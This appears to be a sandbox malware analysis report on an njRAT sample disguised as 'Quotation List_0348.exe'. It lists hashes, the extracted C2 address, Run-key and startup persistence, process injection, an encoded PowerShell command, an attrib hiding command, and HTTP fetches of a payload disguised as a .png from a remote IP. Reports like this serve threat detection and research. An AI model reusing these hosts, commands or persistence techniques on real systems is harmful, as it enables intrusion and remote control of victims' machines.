Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
99s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04/11/2022, 17:34 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Quotation List_0348.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Quotation List_0348.exe
Resource
win10v2004-20220812-en
General
-
Target
Quotation List_0348.exe
-
Size
6KB
-
MD5
53e70bf3a2964e9c086d8ea3ac0daddf
-
SHA1
82c8534e7cf0cf7d899d5871d0da82ba9c875f3b
-
SHA256
246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541
-
SHA512
74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b
-
SSDEEP
96:XVuqNek+1LnGPL5RT2SzLAEy/tnp347KVYzNt:wH1Lqh2SzLAEUNR4g6
Malware Config
Extracted
njrat
v2.0
update
money2022.ddns.net:8080
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1344 update.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk Quotation List_0348.exe -
Loads dropped DLL 1 IoCs
pid Process 976 Quotation List_0348.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nkeqx = "\"C:\\Users\\Admin\\AppData\\Roaming\\Fckiqk\\Nkeqx.exe\"" Quotation List_0348.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\update.exe" Quotation List_0348.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1972 set thread context of 976 1972 Quotation List_0348.exe 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 988 powershell.exe 1972 Quotation List_0348.exe 1672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1972 Quotation List_0348.exe Token: SeDebugPrivilege 988 powershell.exe Token: SeDebugPrivilege 1344 update.exe Token: SeDebugPrivilege 1672 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1972 wrote to memory of 988 1972 Quotation List_0348.exe 27 PID 1972 wrote to memory of 988 1972 Quotation List_0348.exe 27 PID 1972 wrote to memory of 988 1972 Quotation List_0348.exe 27 PID 1972 wrote to memory of 988 1972 Quotation List_0348.exe 27 PID 1972 wrote to memory of 1404 1972 Quotation List_0348.exe 29 PID 1972 wrote to memory of 1404 1972 Quotation List_0348.exe 29 PID 1972 wrote to memory of 1404 1972 Quotation List_0348.exe 29 PID 1972 wrote to memory of 1404 1972 Quotation List_0348.exe 29 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 1972 wrote to memory of 976 1972 Quotation List_0348.exe 30 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 1344 976 Quotation List_0348.exe 31 PID 976 wrote to memory of 364 976 Quotation List_0348.exe 32 PID 976 wrote to memory of 364 976 Quotation List_0348.exe 32 PID 976 wrote to memory of 364 976 Quotation List_0348.exe 32 PID 976 wrote to memory of 364 976 Quotation List_0348.exe 32 PID 1344 wrote to memory of 1672 1344 update.exe 34 PID 1344 wrote to memory of 1672 1344 update.exe 34 PID 1344 wrote to memory of 1672 1344 update.exe 34 PID 1344 wrote to memory of 1672 1344 update.exe 34 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 364 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"2⤵PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Roaming\update.exe"C:\Users\Admin\AppData\Roaming\update.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\update.exe"3⤵
- Views/modifies file attributes
PID:364
-
-
Network
-
Remote address:194.180.48.203:80RequestGET /Bgfjlzp.png HTTP/1.1
Host: 194.180.48.203
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
ETag: "20ac00-5ec90202b35a1"
Accept-Ranges: bytes
Content-Length: 2141184
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
Remote address:194.180.48.203:80RequestGET /Bgfjlzp.png HTTP/1.1
Host: 194.180.48.203
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
ETag: "20ac00-5ec90202b35a1"
Accept-Ranges: bytes
Content-Length: 2141184
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
37.4kB 2.2MB 809 1579
HTTP Request
GET http://194.180.48.203/Bgfjlzp.pngHTTP Response
200 -
36.7kB 2.2MB 796 1577
HTTP Request
GET http://194.180.48.203/Bgfjlzp.pngHTTP Response
200
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD533b6647aac585dac651de8a32f421d31
SHA10b7b6ebbcf2557b8b1aecdf286b6bcea26074f60
SHA25685870715e640843a3249fde91c2054ddeb384fdc4a4fc9c6ec42826800188c73
SHA5125a7d61e88a6587b73ae145bb49b252d01bc9f82858b97cff3e258d7701d94e843ac98542b24b8ea889b260eaf7695449bac86f9826f8265396b4cf60d4a4b232
-
Filesize
6KB
MD553e70bf3a2964e9c086d8ea3ac0daddf
SHA182c8534e7cf0cf7d899d5871d0da82ba9c875f3b
SHA256246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541
SHA51274c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b
-
Filesize
6KB
MD553e70bf3a2964e9c086d8ea3ac0daddf
SHA182c8534e7cf0cf7d899d5871d0da82ba9c875f3b
SHA256246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541
SHA51274c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b
-
Filesize
6KB
MD553e70bf3a2964e9c086d8ea3ac0daddf
SHA182c8534e7cf0cf7d899d5871d0da82ba9c875f3b
SHA256246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541
SHA51274c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b